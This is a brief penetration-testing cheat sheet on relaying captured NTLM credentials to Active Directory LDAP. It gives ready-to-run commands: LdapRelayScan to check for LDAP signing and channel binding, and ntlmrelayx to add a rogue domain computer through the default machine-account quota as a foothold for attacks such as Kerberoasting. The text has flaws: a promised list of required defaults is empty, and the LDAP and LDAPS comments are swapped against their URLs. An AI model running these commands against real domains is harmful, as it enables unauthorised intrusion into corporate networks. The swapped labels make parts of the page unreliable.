LDAP Relaying

LDAP Relaying attacks can make use of NTLM authentication. Similar to SMB Relaying, an attacker who captures credentials via MITM6 or Responder can then relay them to a domain controller, targeting LDAP.

It should be noted that the following two defaults need to be set in order for this to be exploited:



LDAPRelayScan can be utilized to identify whether LDAP Signing and/or LDAP Channel Binding are enabled or not.

# Generic usage of LdapRelayScan.py  
LdapRelayScan.py -u $user -p $password -dc-ip $dcipaddress -method BOTH


Create a new domain computer by abusing the default attribute ms-DS-MachineAccountQuota which is by default set to 10, allowing all authenticated users to add up to 10 computers to the domain.

This account can then be utilized to perform authenticated attacks against the domain such as Kerberoasting.

# Relay to LDAP
ntlmrelayx.py -t ldaps://$dcip --add-computer $computername

# Relay to LDAPS
ntlmrelayx.py -t ldap://$dcip --add-computer $computername 


Last updated